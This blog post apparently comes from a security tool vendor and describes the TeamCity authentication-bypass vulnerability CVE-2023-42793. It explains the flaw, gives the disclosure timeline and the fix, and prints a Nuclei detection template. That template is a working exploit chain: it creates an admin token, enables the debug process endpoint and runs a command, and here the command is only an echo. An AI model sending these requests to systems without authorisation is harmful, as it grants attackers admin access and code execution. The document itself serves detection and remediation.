On September 21, 2023, JetBrains publicly disclosed a critical security vulnerability with their CI/CD platform TeamCity. It was given a CVSS of 9.8 for the potential of bypassing authentication leading to a Remote Code Execution (RCE) attack. CVE-2023-42793 was disclosed and patched; users were urged to update to the latest version to avoid potential attacks. Nuclei Templates v9.6.5, released October 11, 2023, includes a template specifically for checking if this vulnerability exists in your assets.
This blog will discuss the technical details of the vulnerability and other important details, broken down in bullets for easy reading. We also included the template to show how it checks for the presence of the exploitable vulnerability.
Technical Details:
- TeamCity utilizes request interceptors for various actions, one of which is the authorization mechanism.
- A specific interceptor (
RequestInterceptors
) checks if incoming request paths match predefined expressions (myPreHandlingDisabled
). - Matching paths are exempted from pre-handling, including authorization checks.
- One of the excluded path expressions,
"/**/RPC2"
, inadvertently allows any request ending with/RPC2
to bypass authorization. - The endpoint
/app/rest/users/<userLocator>/tokens/RPC2
works because the endpoint's route/app/rest/users/{userLocator}/tokens/{name}
accepts the path variable{name}
at the end. This variable could be any string, but to achieve authentication bypass, it is set toRPC2
. - Attackers can exploit this by creating an authentication token for any user via the request
POST /app/rest/users/<userLocator>/tokens/RPC2
. - The response provides an authentication token for the specified user, granting them application access.
- A debug API endpoint allowed arbitrary process execution when the
rest.debug.processes.enable
the property was set totrue
the by an Admin user, followed by a config reload resulting in arbitrary code execution on the server.
Nuclei Template:
yaml
1id: CVE-2023-42793
2
3info:
4 name: JetBrains TeamCity < 2023.05.4 - Remote Code Execution
5 author: iamnoooob,rootxharsh,pdresearch
6 severity: critical
7 description: |
8 In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible
9 reference:
10 - https://www.jetbrains.com/privacy-security/issues-fixed/
11 - https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793/rapid7-analysis
12 - https://www.sonarsource.com/blog/teamcity-vulnerability
13 - https://nvd.nist.gov/vuln/detail/CVE-2023-42793
14 tags: cve,cve2023,jetbrains,teamcity,rce,auth-bypass,intrusive
15
16http:
17 - raw:
18 - |
19 DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
20 Host: {{Hostname}}
21 Content-Type: application/x-www-form-urlencoded
22
23 - |
24 POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
25 Host: {{Hostname}}
26
27 - |
28 POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1
29 Host: {{Hostname}}
30 Authorization: Bearer {{token}}
31 Content-Type: application/x-www-form-urlencoded
32
33 - |
34 POST /admin/admin.html?item=diagnostics&tab=dataDir&file=config/internal.properties HTTP/1.1
35 Host: {{Hostname}}
36 Authorization: Bearer {{token}}
37 Content-Type: application/x-www-form-urlencoded
38
39 - |
40 POST /app/rest/debug/processes?exePath=echo¶ms={{randstr}} HTTP/1.1
41 Host: {{Hostname}}
42 Authorization: Bearer {{token}}
43
44 matchers-condition: and
45 matchers:
46 - type: word
47 part: body_2
48 words:
49 - '<token name="RPC2" creationTime'
50
51 - type: word
52 part: body_5
53 words:
54 - 'StdOut:{{randstr}}'
55
56 extractors:
57 - type: regex
58 part: body_2
59 name: token
60 group: 1
61 regex:
62 - 'value="(.*?)"'
63 internal: true
Timeline:
The vulnerability was reported on September 6, the vulnerability was confirmed on September 14, the fix was released on September 18, and the public announcement on September 21. JetBrains acknowledged the vulnerability and released a fix in version 2023.05.4 of TeamCity.
Remediation:
Users are strongly advised to upgrade their TeamCity instance to version 2023.05.4 or later to patch this vulnerability.
References:
Stay up to date with the latest Nuclei Template releases by joining our Discord. Join our mission to Democratize Security and get the monthly community newsletter delivered to your inbox.